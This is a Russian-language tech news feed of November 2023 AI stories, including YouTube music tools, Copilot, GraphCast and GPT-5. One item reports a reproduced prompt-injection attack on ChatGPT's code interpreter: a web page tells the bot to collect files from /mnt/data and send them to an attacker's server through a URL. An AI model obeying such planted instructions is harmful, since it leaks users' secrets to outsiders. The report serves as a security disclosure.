Опрос
|
реклама
Быстрый переход
В YouTube появится ИИ-генератор музыки — он даже сможет писать песни в стиле известных исполнителей
16.11.2023 [18:13],
Павел Котов
Google рассказала о тестировании новых функций генеративного искусственного интеллекта для YouTube, которые помогут людям создавать музыкальные композиции по текстовым описаниям и простому напеву в микрофон. Одна из них предлагает генерацию треков в стиле известных исполнителей, причём с их разрешения. ![]() Источник изображения: Alexander Shatov / unsplash.com Администрация платформы развивает инновации с оглядкой на новые нормы авторского права в отношении музыкальных произведений, созданных с участием ИИ. Одна из новых функций получила название Dream Track — она уже тестируется с «небольшой группой авторов из США» и позволяет генерировать произведения в стиле девяти известных исполнителей: Алека Бенджамина (Alec Benjamin), Чарли Пута (Charlie Puth), Charli XCX, Деми Ловато (Demi Lovato), Джона Ледженда (John Legend), Папуза (Papoose), Сиа (Sia), T-Pain и Троя Сивана (Troye Sivan). Платформа принимает на себя почти всю работу: генерацию текста, фонограммы и голосовой партии в стиле заданного исполнителя. Получившиеся записи загружаются в раздел коротких роликов YouTube Shorts. ![]() Источник изображения: blog.youtube На YouTube разрабатываются и другие ИИ-инструменты, позволяющие создавать композиции без традиционных творческих средств. К примеру, можно напеть мелодию, дополнить её текстовым описанием «соло на саксофоне» и получить приемлемый результат. Можно также превратить битбокс в полноценный луп на ударных, а аккорды на MIDI-клавиатуре — в хоровую партию. Участники инкубатора Music AI смогут протестировать эти инструменты уже до конца года. Новые функции Google реализует на основе музыкальной ИИ-модели Lyria, созданной подразделением DeepMind. Отмечается, что созданные при помощи Lyria композиции помечаются при помощи технологии SynthID — метка не слышна человеческому уху, но сохраняется при изменении трека, переживая сжатие MP3 или изменение скорости. Реальная польза от ИИ: Microsoft встроила GPT-4 в визуальный помощник Be My Eyes AI для незрячих людей
16.11.2023 [18:07],
Сергей Сурабекянц
Microsoft заключила партнёрское соглашение с компанией Be My Eyes, которая помогает людям с нарушениями зрения решать повседневные задачи с помощью волонтёров. Софтверный гигант интегрировал созданный Be My Eyes инструмент цифрового помощника Be My AI в свою службу Microsoft Disability Answer Desk, позволяющую слабовидящим пользователям решать технические проблемы или выполнять такие задачи, как обновление программного обеспечения без помощи работника колл-центра. ![]() Be My AI использует модель зрения на основе OpenAI GPT-4 для создания описаний изображения, например, фотографии, инструкции по настройке компьютера или этикетки продукта. Благодаря общению на естественном языке с использованием ИИ, инструмент также предоставляет контекстные рекомендации, помогающие незрячим и слабовидящим пользователям лучше адаптироваться и решать различные проблемы. После совместного с Microsoft тестирования Be My AI в начале этого года компания Be My Eyes заявила, что инструмент обрабатывает запросы в среднем за четыре минуты, что составляет менее половины среднего времени разговора с агентами-людьми. Кроме того, лишь 10 % пользователей потребовался разговор с представителем службы поддержки клиентов после взаимодействия с инструментом ИИ. «Microsoft гордится тем, что является первой компанией, которая интегрировала Be My AI в службу поддержки клиентов. Интеграция данного решения создаёт инновационный, быстрый и эффективный способ получения помощи от Microsoft для клиентов с ограниченными возможностями, — заявила Дженни Лэй-Фларри (Jenny Lay-Flurrie), директор Microsoft по вопросам доступности. — Объединив опыт Microsoft и инновационные решения Be My AI, мы обеспечиваем независимость людям с ограниченными возможностями». ![]() Источник изображения: Be My Eyes Партнёрство Microsoft с Be My Eyes — это очередной шаг компании к повышению доступности её продуктов на основе ИИ. Ранее в этом году на ежегодном саммите Microsoft Ability Summit компания представила «Помощника по доступности» для Microsoft 365, который в режиме реального времени ассистирует в создании контента. Доступность контента для людей с ограниченными возможностями зависит от структуры документа, цветов фона и текста, наличия описаний для изображений, оформления таблиц и использования абзацев. OpenAI на своей первой конференции для сообщила, что её продукты используют более 2 миллионов разработчиков, из которых 92 % работают в компаниях из списка Fortune 500. Компания также представила ряд новых функций, например, инструмент для создания пользовательских версий ChatGPT без необходимости программирования. На конференции была упомянута и Be My Eyes. «OpenAI гордится сотрудничеством с Be My Eyes, — сказал Брэд Лайткэп (Brad Lightcap), главный операционный директор OpenAI. — Они использовали наши модели искусственного интеллекта, чтобы значительно улучшить повседневную жизнь людей с плохим зрением или слепотой». Be My Eyes в настоящее время проводит бета-тестирование своего инструмента Be My AI совместно с другими компаниями, включая Sony, Procter & Gamble и Hilton. Adobe представила Project Sound Lift — новаторский инструмент на основе ИИ, способный выделять голос из шумного фона
16.11.2023 [04:35],
Дмитрий Федоров
Adobe открыла новую главу в истории обработки звука с Project Sound Lift — революционным инструментом на основе ИИ, который обещает кардинально изменить подход к разделению слоёв звука в аудиозаписях. Этот инструмент выделяет голос из фонового шума с невиданной ранее точностью. ![]() Источник изображения: Adobe Новинка предлагает широкий спектр фильтров: от аплодисментов и смеха до сигналов тревоги, человеческой речи, шума толпы или дороги, звука клавиатуры и многого другого. Это значительно расширяет возможности работы со звуком по сравнению с существующими аналогами, такими как Clear компании Supertone и Voice Separator компании GOYO, которые ограничиваются разделением и коррекцией звукового окружения, голоса и его реверберации. В отличие от них, Project Sound Lift автоматически обнаруживает каждый звук, создавая отдельные файлы, например, для фонового шума и приоритетного звука. В демонстрации показан процесс работы с этим инструментом. Пользователю необходимо импортировать видеофайл в приложение и выбрать, какой звук следует отфильтровать. Такие технологии уже нашли своё применение в музыкальной индустрии. Например, при восстановлении и выпуске песни The Beatles «Now and Then» использовался аналогичный подход. Тогда с помощью ИИ удалось отделить фортепианную партию от голоса Джона Леннона (John Lennon), что стало настоящим достижением в области реставрации звука. С учётом возрастающей роли аудиоконтента в цифровом мире, такие инновации могут оказать значительное влияние на индустрию в целом. Microsoft скоро внедрит ИИ-помощника Copilot вообще везде — 1 декабря он выйдет из беты
15.11.2023 [23:56],
Николай Хижняк
Исходя из заявлений, прозвучавших на конференции Ignite, компания Microsoft хочет использовать ИИ-помощника Copilot практически везде в составе веб-сервиса офисных приложений Microsoft 365. Компания сообщила, что общий релиз Copilot для Microsoft 365 состоится к началу следующего года. ![]() Источник изображений: Microsoft Для потребителей Microsoft предложит Copilot в составе программного пакета Microsoft 365 Office, куда входят такие программы, как Outlook и Teams. Компания также сообщила, что планирует удалить ИИ-чат-бота Bing Chat и в целом избавиться от этого бренда, заменив его на Copilot в сервисах как для домашних пользователей, так и для корпоративных. Microsoft также отметила, что бета-тестирование Copilot скоро завершится и ИИ-помощник станет общедоступным с 1 декабря текущего года. Пользователи бета-версии Copilot для Windows, возможно, обратили внимание, что при работе на ПК, особенно с открытой боковой панелью Copilot с правой стороны экрана, ИИ-помощник реагирует практически на все действия пользователя. Например, скопированный текст автоматически помещается в Copilot и доступен для дальнейших действий со стороны пользователя, связанных, например, с редактированием и т.д. Аналогичным образом Copilot будет работать в таких приложениях, как Teams, расшифровывая и делая заметки во время виртуальных конференций, а также самостоятельно подводя итоги по ключевым моментам по завершении собрания. В последнем случае часть анализа может быть выполнена самой платформой Teams. Однако при подписке на сервис Dynamics 365 ИИ-помощник Copilot также будет предлагать различные темы и инструменты, например, связанные с продажами. Веб-сервисами Microsoft 365 ежемесячно пользуются более 300 млн человек по всему миру, поэтому у Microsoft имеются большие планы по добавлению ИИ-помощника в свои основные приложения. Copilot будет предлагаться не только обычным пользователям, но также и администраторам. Напомним, что корпоративная подписка на Microsoft 365 Copilot обойдётся в 30 дополнительных долларов в месяц. В приложение Teams компания интегрирует ИИ-помощника Copilot в состав виртуальной интерактивной доски Whiteboard для совместной работы в режиме реального времени. Copilot не только будет вносить свой вклад в иллюстрации, которые будут отображаться в Whiteboard, но также сможет обобщать информацию. Затем этой информацией можно будет поделиться через сервис Microsoft Loop для совместной работы в режиме реального времени. ИИ-помощник Copilot также сможет делать заметки в ходе собраний Teams в режиме реального времени и делиться ими с другими участниками этих собраний. По словам Microsoft, эти заметки будут «запрашиваемыми». Иными словами, у Copilot можно будет запросить более подробную информацию о том, что сказал тот или иной участник собрания. Эта функция также станет частью классической и веб-версии Teams в рамках обновлений в следующем году. При помощи Copilot также можно будет закрывать комнаты для собраний Teams без указания причин. Для тех организаций, которые используют функцию звонков в Teams, ИИ-помощник будет делать заметки об этих звонках. ![]() В приложении Outlook ИИ-помощник Copilot появится в начале 2024 года. Благодаря Copilot приложение сможет создавать или читать краткое содержание обсуждений, а затем планировать последующие встречи, предлагая участников, анализируя их графики, а также сообщая ключевую тему этих собраний. Кроме того, Copilot в составе Outlook сможет собирать воедино всю информацию о той или иной предстоящей встрече, добавлять, относящиеся к теме вопроса электронные письма и файлы. Microsoft также интегрирует Copilot в приложение Word. ИИ-помощник будет более детально отслеживать вносимые в документы изменения. Например, если редактор перепишет какую-то часть текста, то можно будет попросить Copilot выделить наиболее значимые внесённые изменения. Компания также объединит Copilot с Graph для более персонализированной аналитики. Все это произойдёт в начале 2024 года. ИИ-помощник Copilot для Windows наделён возможностью просмотра веб-страниц через поисковик Bing и поддержкой различных плагинов, расширяющих его возможности по сбору информации. Аналогичной особенностью будет обладать Copilot для Microsoft 365. По словам Microsoft, для Microsoft 365 Copilot уже доступна поддержка некоторых плагинов для работы с Bing, Microsoft Dataverse, Jira, Trello, Mural, Confluence, Freshworks, Priority Matrix и другими платформами. Свои плагины для Copilot также разрабатывают Wells Fargo и KPMG. Microsoft разработала специализированные версии Copilot для своей платформы Viva Insights, предназначенной для анализа и планирования рабочего времени. Кроме того, Copilot будет интегрирован в сервис Power Automate, предназначенный для автоматизации рабочих процессов. Суть платформы заключается в том, что она записывает определенную последовательность действий или операций пользователя, которые в дальнейшем будет выполнять автоматизированный процесс. Подробностей не приводится, но, вероятно, Copilot расширит возможности платформы и одновременно упростит её использование. Copilot для Power Automate по-прежнему находится в стадии разработки и компания пока не уточняет, когда функции ИИ станут доступными для использования. Компания также сообщила, что в 2024 году объединит сервисы Microsoft To Do, Planner и Project, предназначенные для планирования, в единый сервис Microsoft Planner. Google разработала ИИ, который даёт самые точные в мире прогнозы погоды
15.11.2023 [12:40],
Павел Котов
Лондонская лаборатория искусственного интеллекта Google DeepMind разработала систему, которая, по словам авторов проекта, составляет самые точные в мире прогнозы погоды на десять дней. Модель получила название GraphCast — она работает быстрее и точнее погодного симулятора HRES (High-Resolution Forecast), который считается отраслевым стандартом. ![]() Источник изображения: deepmind.google Данные GraphCast были проанализированы экспертами Европейского центра среднесрочных прогнозов погоды (ЕЦСПП) — межправительственной организацией, которая составляет HRES. Действующая версия GraphCast размещена на сайте ЕЦСПП. В сентябре она за девять дней предсказала, что на побережье Новой Шотландии (Канада) обрушится ураган «Ли», а традиционные средства прогнозирования установили это лишь за шесть дней. Кроме того, они оказались менее точными в аспекте времени и места выхода стихии на берег. GraphCast способна идентифицировать опасные погодные явления, даже не будучи обученной их находить. С интеграцией простого средства отслеживания циклонов модель прогнозирует их движение более точно, чем метод HRES. Учитывая, что климат становится всё более непредсказуемым, своевременность и точность прогнозов окажется критической при планировании мероприятий перед лицом угрозы стихийных бедствий. Традиционные методы составления прогнозов погоды основаны на сложных физических уравнениях — они переводятся в алгоритмы, которые обрабатываются суперкомпьютерами. Это кропотливый процесс, который требует специальных знаний и огромных вычислительных ресурсов. Модель GraphCast сочетает алгоритмы машинного обучения и графовые нейросети — архитектуру для обработки пространственно структурированных данных. Для изучения причинно-следственных связей систему обучили на массиве метеорологической информации за 40 лет: ЕЦСПП предоставил данные мониторинга со спутников, радаров и метеостанций. Алгоритм, впрочем, не пренебрегает и традиционными подходами: когда в наблюдениях обнаруживаются пробелы, они восполняются за счёт физических методов прогнозирования. ![]() Источник изображения: charts.ecmwf.int GraphCast составляет прогнозы в разрешении 0,25° широты и долготы. Иными словами, Земля разбита на миллион участков, по каждому из которых готовится прогноз с пятью переменными на земной поверхности и шести атмосферными показателями, которые охватывают атмосферу планеты в трёх измерениях на 37 уровнях. Переменные включают в себя показатели температуры, ветра, влажности, осадков и давления на уровне моря. Учитывается также геопотенциал — гравитационная потенциальная энергия на единицу массы в указанной точке относительно уровня моря. В ходе испытаний модель GraphCast на 90 % превзошла самые точные детерминированные системы для 1380 тестовых объектов. В тропосфере — нижнем слое атмосферы — прогнозы GraphCast оказалась точнее HRES по 99,7 % тестовых переменных. При этом модель демонстрирует высокую эффективность: прогноз на десять дней выполняется менее чем за минуту на одной машине Google TPU v4, тогда как традиционный подход требует нескольких часов работы суперкомпьютера с сотнями машин. Несмотря на внушительные результаты, разработка GraphCast ещё не завершена: модель достаточно точно оценивает движение циклонов, но пока уступает традиционным методам в составлении их характеристик. Не исключено, что модель будет совершенствоваться и по другим аспектам, что только повысит её точность. Google DeepMind предлагает всем желающим присоединяться к проекту — разработчик опубликовал исходный код модели. OpenAI заморозила регистрацию платных подписчиков ChatGPT Plus — спрос превысил вычислительные возможности
15.11.2023 [12:23],
Андрей Созинов
Компания OpenAI приостановили регистрацию новых пользователей платной версии своего чат-бота с искуственным интеллектом ChatGPT в связи с чрезмерно высоким спросом. Об этом сообщил во вторник генеральный директор Сэм Альтман (Sam Altman). ![]() На прошлой неделе компания Альтмана представила на своей первой конференции для разработчиков новые функции и обновления, позволяющие пользователям создавать собственные версии ChatGPT для решения конкретных задач. Эти анонсы вызвали резкий рост спроса на инструменты и сервисы искусственного интеллекта OpenAI. «Мы приостанавливаем регистрацию новых участников ChatGPT Plus на некоторое время. Резкий рост числа пользователей после конференции для разработчиков превысил наши возможности, и мы хотим убедиться, что все получат отличный опыт», — написал Альтман на своей странице в X. Также он предложит подписаться на рассылку, чтобы получить уведомление, когда платная подписка ChatGPT Plus снова станет доступна. OpenAI сообщила на своей конференции, что еженедельно её услугами пользуются около 100 млн. человек, а более 90 % компаний из списка Fortune 500 создают инструменты на платформе OpenAI. Однако системы ИИ, в том числе и ChatGPT, требуют огромной вычислительной мощности для своей работы, и по всей видимости OpenAI на данный момент не располагает достаточным количеством систем, чтобы гарантировать плавную работу сервиса. Поэтому, чтобы не разочаровывать пользователей платной версии, которая стоит $20 в месяц и предоставляет доступ к мощной нейросети GPT-4, компания решила приостановить регистрации. При этом в бесплатной версии ChatGPT на базе GPT-3.5 ограничений пока что нет. Напомним, на недавней конференции для разработчиков OpenAI представила опцию, с помощью которой пользователи смогут создавать собственные специализированные версии ChatGPT, называемые просто GPT и заточенные под их задачи. Например, они смогут помочь обучить ребенка математике или объяснить правила настольной игры. По словам компании, для этого не требуются навыки программирования. В конце этого месяца OpenAI также планирует открыть маркетплейс, в котором пользователи смогут находить уже готовые специализированные GPT других пользователей и зарабатывать на своих собственных, подобно тому, как это делается с приложениями в Apple App Store или Google Play. YouTube обяжет маркировать контент, созданный с помощью ИИ — нарушителей отключат от монетизации
15.11.2023 [09:30],
Владимир Фетисов
Видеосервис YouTube готовится к изменению политики платформы в отношении размещаемого пользователями контента. В скором времени авторы будут обязаны помечать ролики, при создании которых использовались инструменты на базе искусственного интеллекта. Соответствующее сообщение появилось в блоге YouTube. ![]() Источник изображения: Christian Wiediger / unsplash.com В ближайшие несколько месяцев YouTube введёт новые правила, чтобы пользователи сервиса могли чётко понимать, когда перед ними сгенерированный ролик, а когда настоящее видео. Новые правила, в том числе, затронут созданные с помощью ИИ видео, на которых человек что-то говорит или делает, чего никогда не делал в реальной жизни. «Мы потребуем от авторов раскрытия информации о том, когда они создали изменённый или синтетический контент, являющийся реалистичным, в том числе с использованием инструментов искусственного интеллекта. При загрузке контента у авторов появятся новые опции, которые позволят указать, что ролик содержит реалистично изменённый или синтетический материал. Например, это может быть созданное искусственным интеллектом видео, реалистично изображающее событие которого никогда не было, или контент, показывающий, как кто-то говорит или делает то, чего на самом деле не делал», — говорится в сообщении YouTube. В сообщении отмечается, что возможность отличить сгенерированное видео от реального особенно важна, когда речь заходит об обсуждении деликатных тем, таких как политические выборы, продолжающиеся конфликты, кризисы в области общественного здравоохранения или обсуждение государственных должностных лиц. Авторы, которые не будут соблюдать новые правила и откажутся от маркировки ИИ-контента, подвергнутся штрафным санкциям. Опубликованные ими видео могут быть удалены с площадки, а сами авторы могут быть исключены из партнёрской программы YouTube. Что касается самой маркировки, то она будет отображаться в описании ролика, а также поверх самого видео. Создан ИИ, который превращает 2D-изображение в 3D-модель за пять секунд
14.11.2023 [13:27],
Дмитрий Федоров
Исследователи из Adobe и Австралийского национального университета разработали алгоритм, преобразующий двухмерные изображения в трёхмерные модели всего за 5 секунд. Этот прорыв обещает революционизировать создание контента в дизайне и развлечениях, хотя стоит остерегаться возможных проблем с размытыми текстурами и нарушениями авторских прав. ![]() Источник изображения: Placidplace / Pixabay Новый алгоритм, названный Большой моделью реконструкции (Large Reconstruction Model или LRM), стал значительным прогрессом в быстром создании трёхмерных моделей на основе одного изображения. Алгоритм, обученный на большом наборе данных из около миллиона трёхмерных объектов, доступных в базах Objaverse и MVImgNet, продемонстрировал исключительную способность к обобщению при работе с разнообразными изображениями при создании 3D-контента. В отличие от предыдущих моделей, обученных на ограниченных наборах данных с фокусом на одну категорию изображений, LRM использует трансформерную архитектуру, ставшую основой для множества разработок в области глубокого обучения, с 500 млн параметров. Это позволяет ИИ-модели эффективно работать с разнообразными типами изображений, включая фотографии из реального мира и визуальные коллажи, созданные другими ИИ-сервисами, такими как DALL-E и Stable Diffusion. ![]() Источник изображения: yiconghong.me Ицонг Хонг (Yicong Hong), ведущий автор исследования, подчеркнул, что LRM является значительным прорывом в области трёхмерной реконструкции. Алгоритм способен воспроизводить детальную геометрию и сложные текстуры, например, текстуру дерева, сохраняя при этом качество и точность. Применение LRM может стать поистине масштабным, от дизайна и развлечений до игровой индустрии. Для дизайнеров и 3D-художников это означает ускорение процесса создания моделей, что особенно важно при разработке видеоигр и анимации. Кроме того, возможность использования LRM обычными пользователями обещает сделать 3D-моделирование прерогативой не только профессионалов. Теперь создавать детализированные модели можно будет даже из фотографий, сделанных на смартфоне. Тем не менее, у LRM есть свои ограничения, такие как размытость текстур в скрытых участках изображения. Также стоит учитывать вопросы авторских прав, особенно в контексте использования изображений, созданных другими ИИ-сервисами. Для демонстрации возможностей LRM исследователи создали страницу с видеодемонстрациями и интерактивными 3D-моделями. Это подчёркивает растущую роль ИИ в современном мире и его потенциальное влияние на будущее креативных отраслей. В новом инструменте ChatGPT нашли старую дыру в безопасности — через неё хакеры могут воровать конфиденциальные данные
14.11.2023 [12:52],
Павел Котов
В платной версии службы ChatGPT Plus появился интерпретатор Python, который значительно упрощает написание кода и даже позволяет его запустить в изолированной среде. К сожалению, эта изолированная среда, которая также используется для обработки электронных таблиц, их анализа и построения диаграмм, является уязвимой, и выявленные ранее механизмы атак до сих пор воспроизводятся, подтвердил шеф-редактор ресурса Tom’s Hardware Аврам Пилч (Avram Piltch). ![]() Источник изображения: Jonathan Kemper / unsplash.com При наличии учётной записи ChatGPT Plus, необходимой для доступа к расширенным функциям, всё так же удаётся воспроизвести эксплойт, о котором сообщил эксперт по кибербезопасности Иоганн Ребергер (Johann Rehberger). Он предполагает вставку ссылки на внешний ресурс в окно чата и интерпретацию ботом инструкций на соответствующей странице так же, как он выполнял бы прямые команды пользователя. Практика показала, что с каждым очередным сеансом чата платформа создаёт новую виртуальную машину на Ubuntu; путь к её домашнему каталогу — «/home/sandbox», а все загружаемые файлы оказываются доступными в «/mnt/data». ChatGPT Plus, конечно, не предоставляет непосредственного доступа к командной строке, но команды Linux можно вводить прямо в окно чата, и тот в большинстве случаев возвращает результаты. К примеру, при помощи команды «ls» удалось получить список всех файлов в «/mnt/data». Аналогичным образом можно открыть домашний каталог («cd /home/sandbox») и командой «ls» получить список находящихся в нём подкаталогов. Для проверки работоспособности эксплойта экспериментатор загрузил в диалоговом окне файл «env_vars.txt», в который были записаны несуществующие ключ API и пароль — предполагается, что эти данные являются важными. Для обходного доступа к загруженному файлу была создана размещённая на внешнем ресурсе веб-страница с набором инструкций, которые предписывают ChatGPT взять все данные из файлов ([DATA]) в папке «/mnt/data», внести их в строку текста в ответном URL-адресе и отправить их на подконтрольный «злоумышленнику» сервер, перейдя по ссылке вида «http://myserver.com/data.php?mydata=[DATA]». На «вредоносной» странице показывался прогноз погоды — так автор эксперимента продемонстрировал, что атака «командной инъекции» (prompt injection) может осуществляться со страницы с достоверной информацией. ![]() Источник изображения: tomshardware.com Адрес «вредоносной» страницы вставили в поле чата, и тот отреагировал, как от него ожидали: составил сводку по её содержимому, пересказав прогноз погоды; и выполнил «вредоносные» инструкции. Подконтрольный «злоумышленнику» сервер был настроен на журналирование (сбор логов) запросов, что позволило использовать его для сбора данных. В результате ChatGPT послушно передал на внешний ресурс содержимое файла с данными, которые имели формат критически важных: ключ API и пароль. Эксперимент воспроизводили несколько раз, и ChatGPT с переменным успехом делился полученной ранее информацией. Её роль выполнял не только текстовый файл, но и таблица CSV. Иногда чат-бот отказывался переходить на внешний ресурс, но делал это в следующем сеансе переписки. Иногда отказывался передавать данные на внешний сервер, но выводил содержащую эти данные ссылку. Журналист допустил, что проблема может показаться надуманной, но это действительно уязвимость, которой в ChatGPT быть не должно: платформа не должна выполнять инструкции с внешних ресурсов, но она выполняет их и делает это уже давно. OpenAI приступила к разработке флагманской нейросети GPT-5
14.11.2023 [10:53],
Павел Котов
OpenAI работает над моделью искусственного интеллекта GPT-5 и планирует привлечь от Microsoft дополнительные инвестиции, которые будут способствовать развитию её проектов. Об этом рассказал гендиректор компании Сэм Альтман (Sam Altman) в интервью Financial Times. ![]() Источник изображений: Mariia Shalabaieva / unsplash.com По словам Альтмана, инженеры OpenAI уже работают над GPT-5. Новая модель ИИ будет более продвинутой по сравнению с GPT-4, хотя пока технически сложно предсказать, в каком именно аспекте. Дату выхода платформы глава компании назвать отказался, но уточнил, что для её обучения потребуется больше данных, чем при настройке прежних моделей OpenAI. Необходимую информацию разработчик планирует получать из общедоступных источников и от других компаний: на минувшей неделе компания запустила партнёрскую инициативу, в рамках которой сторонние организации смогут предоставлять массивы данных для обучения собственных проектов в области ИИ. GPT-4, представленный в марте актуальный флагманский продукт OpenAI, был значительным шагом вперёд по сравнению со своими предшественниками: нейросеть научилась отвечать на более широкий круг вопросов и стала делать это более точно. На прошлой неделе компания представила усовершенствованный вариант GPT-4 Turbo. ![]() Разработка больших языковых моделей — занятие дорогостоящее. OpenAI рассчитывает «со временем привлечь намного больше» средств от Microsoft и других инвесторов для реализации своих проектов. Софтверный гигант уже инвестировал в стартап $10 млрд при оценке в $29 млрд. OpenAI также рассматривает возможность вторичной продажи активов при оценке в $86 млрд — данная процедура предполагает продажу акций существующими инвесторами компании, а сама она при этом нового капитала не привлекает. Значительная часть затрат на обучение ИИ связана с аппаратными ускорителями: флагманская модель NVIDIA H100 сейчас стоит порядка $40 000. Несмотря на «жестокий кризис» в поставках ускорителей, OpenAI уже начала получать их и ожидает новой партии к концу года, сообщил Альтман — по его словам, в следующем году ситуация с поставками может выправиться. Уходящий год был достаточно успешным для компании в финансовом плане, но на прибыльность выйти до сих пор не получилось. Долгосрочной целью инженерных инвестиций OpenAI является разработка сильного искусственного интеллекта (Artificial General Intelligence — AGI). Этим термином обозначается гипотетическая ИИ-модель, способная выполнять широкий спектр задач и изучать новые наравне с человеком. Выпуск больших языковых моделей является важным этапом на пути к AGI, «но помимо этого будет множество других вещей». Мошенники стали распространять вирусы под видом ИИ-бота Bard — Google обратилась в суд
13.11.2023 [16:05],
Дмитрий Федоров
Google начала юридическую войну против мошенников из Вьетнама, которые, используя шумиху вокруг генеративного ИИ, обманом побуждают пользователей скачивать и устанавливать якобы «неопубликованную версию ИИ-чат-бота Google Bard», скрывающую в себе вредоносное ПО, крадущее данные пользователей. ![]() Источник изображения: Franz26 / Pixabay В иске, поданном в штате Калифорния (США), Google обвинила неизвестных мошенников, предположительно из Вьетнама, в создании фейковых страниц в социальных сетях, включая Facebook✴, и запуске рекламных кампаний, направленных на распространение вредоносного ПО под видом «неопубликованной версии» генеративного ИИ Bard. Мошенники используют торговые марки Google, в том числе Google AI и Bard, для привлечения ничего не подозревающих пользователей. Эти действия напоминают криптовалютные аферы, когда мошенники эксплуатируют интерес людей к новейшим технологиям. В данном случае злоумышленники вводят в заблуждение пользователей, утверждая, что Bard — это платное приложение, требующее загрузки, хотя на самом деле оно доступно бесплатно на сайте bard.google.com ![]() Скриншот из документа Google, демонстрирующий один из мошеннических аккаунтов (источник изображения: Google) Google уже приняла меры, подав более 300 запросов на удаление материалов, связанных с действиями злоумышленников, и стремится предотвратить регистрацию новых мошеннических доменов. Компания также хочет добиться блокировки таких доменов у американских регистраторов. «Судебные иски являются эффективным инструментом для создания правового прецедента, разрушения инструментов, используемых мошенниками, и повышения степени ответственности для недобросовестных игроков», — написала главный юрисконсульт Google Халима ДеЛейн Прадо (Halimah DeLaine Prado) в блоге компании. В эпоху бурного развития информационных технологий мошенники неустанно ищут новые методы обмана, активно используя интерес людей к передовым технологиям, таким как ИИ. Иск Google не только служит защите собственных интересов и безопасности пользователей, но и является важным сигналом о необходимости сотрудничества для борьбы с международной киберпреступностью. ИИ-агенты Билла Гейтса: как новый виток в эволюции компьютерных технологий изменит повседневную жизнь человека
12.11.2023 [13:31],
Дмитрий Федоров
Билл Гейтс (Bill Gates), сооснователь корпорации Microsoft, в своём блоге поделился прогнозами о будущем ИИ и его роли в нашей повседневной жизни. Гейтс уверен, что в ближайшие 5 лет ИИ радикально изменит способы, которыми мы используем компьютеры и мобильные устройства. ![]() Источник изображения: Mohamed_hassan / Pixabay По мнению Гейтса, скоро не потребуется использовать отдельные приложения для различных задач. Вместо этого мы сможем обращаться к нашим устройствам на обычном языке, и они смогут обрабатывать наши запросы. Это станет возможным благодаря развитию персональных помощников на основе ИИ, которые будут значительно превосходить сегодняшние технологии. Гейтс называет такие программы «агентами». Он предсказывает, что эти агенты не только изменят способ взаимодействия людей с компьютерами, но и радикально трансформируют индустрию ПО. Это будет самая значительная революция в вычислительной технике с момента перехода от ввода команд в компьютерном терминале к использованию графических интерфейсов. Ключевым аспектом работы агентов является их способность узнавать пользователя как личность. Чем больше они узнают о вас, тем лучше смогут предвидеть ваши потребности и помогать вам. «Они проактивны, способны предлагать решения до того, как вы их запросите. Они работают через приложения, улучшаясь со временем, запоминая ваши действия и распознавая намерения и модели вашего поведения. На основе этой информации они предлагают то, что, по их мнению, вам нужно, хотя конечное решение всегда за вами», — пишет Гейтс. Гейтс также затрагивает тему влияния ИИ на здравоохранение, образование, производительность, развлечения и другие сферы нашей повседневной жизни. В здравоохранении, например, агенты смогут помогать в базовой триажной диагностике и советах по лечению, а также помогать медицинским работникам в принятии решений. В образовании агенты будут дополнять работу учителей, персонализируя обучение для студентов и освобождая учителей от рутинных задач. В сфере производительности агенты будут помогать в различных задачах, таких как составление бизнес-планов или организация встреч. В развлечениях и покупках агенты будут не только делать рекомендации, но и помогать действовать в соответствии с ними. Гейтс видит ИИ как неотъемлемую часть каждого аспекта нашего существования. В своём блоге Гейтс также высказывает мнение, что агенты станут следующей важной платформой в индустрии вычислительной техники. «Агенты смогут помочь практически в любой деятельности и любой области жизни. В индустрии компьютерных технологий мы говорим о платформах — технологиях, на которых строятся приложения и сервисы. Android, iOS и Windows — это платформы. Агенты станут следующей платформой», — утверждает Гейтс. OpenAI запустит партнёрскую программу, призванную собирать уникальные данные от сторонних организаций для обучения ИИ
10.11.2023 [06:29],
Дмитрий Федоров
Компания OpenAI объявила о запуске новой партнёрской программы OpenAI Data Partnerships, целью которой является получение уникальных наборов данных от сторонних организаций для обучения своих ИИ-моделей. Эта инициатива направлена на привлечение обширных баз данных, в том числе тех, которых нет в свободном доступе. Отличительной чертой программы является её всеобъемлющий характер: данные не обязательно должны быть количественными или в текстовом формате — программа также открыта для изображений, аудио и видео. ![]() Источник изображения: Franz26 / Pixabay Собираемые данные могут охватывать любую тематику и быть представлены на любом языке, главное требование — они должны отражать человеческое намерение, быть похожими на длинные сочинения или тщательно расшифрованные диалоги. Это позволит OpenAI существенно улучшить такие инструменты, как технологии автоматического распознавания речи, и расширить функциональность ChatGPT, в том числе поддержку голосовых запросов, что сделает взаимодействие с пользователем более естественным. Проведение тестирования модели в рамках OpenAI Data Partnerships в будущем расширит возможности флагманской нейросети GPT-4 Turbo, которая недавно была обновлена для более содержательных ответов пользователям. Компания сообщает, что уже начала работать с заинтересованными организациями, в том числе с правительством Исландии. С помощью специально подобранных наборов данных OpenAI стремится улучшить способность GPT-4 понимать запросы пользователей на исландском языке. Частные или государственные организации, желающие участвовать в партнёрской программе OpenAI, могут подать заявку на сайте компании, указав тип и объём предоставляемых данных. Предлагаются два пути передачи данных: первый — это архив Open-Source, который идеально подходит для наборов данных, имеющих отношение к обучению языковых моделей. Однако данные, представленные таким образом, будут доступны всем желающим. В качестве альтернативы OpenAI предлагает организациям предоставить информацию в виде частных данных, которые будут использованы в обучении собственных ИИ-моделей, включая базовые, точные и пользовательские модели. Этот вариант рекомендуется для компаний и учреждений, которые хотят сохранить конфиденциальность своих данных. OpenAI подчёркивает, что не заинтересована в данных, содержащих персональную или чувствительную информацию. При реализации этой программы внимание общественности будет приковано к вопросам конфиденциальности, учитывая растущую аудиторию ChatGPT, которая насчитывает около 100 млн активных пользователей еженедельно. Прецеденты, такие как утечка данных, допущенная сотрудниками Samsung, показывают важность обеспечения безопасности информации. OpenAI заверяет, что не использует генерируемые через свой API данные для обучения собственных ИИ-моделей без явного согласия пользователей. Однако методы обработки и защиты конфиденциальных данных, собранных в рамках партнёрской программы OpenAI Data Partnerships, будут тщательно анализироваться как специалистами, так и широкой общественностью. Microsoft взбесила сценаристов, дизайнеров и других работников игровой индустрии, анонсировав ИИ-инструменты для создания игр
09.11.2023 [22:01],
Николай Фрей
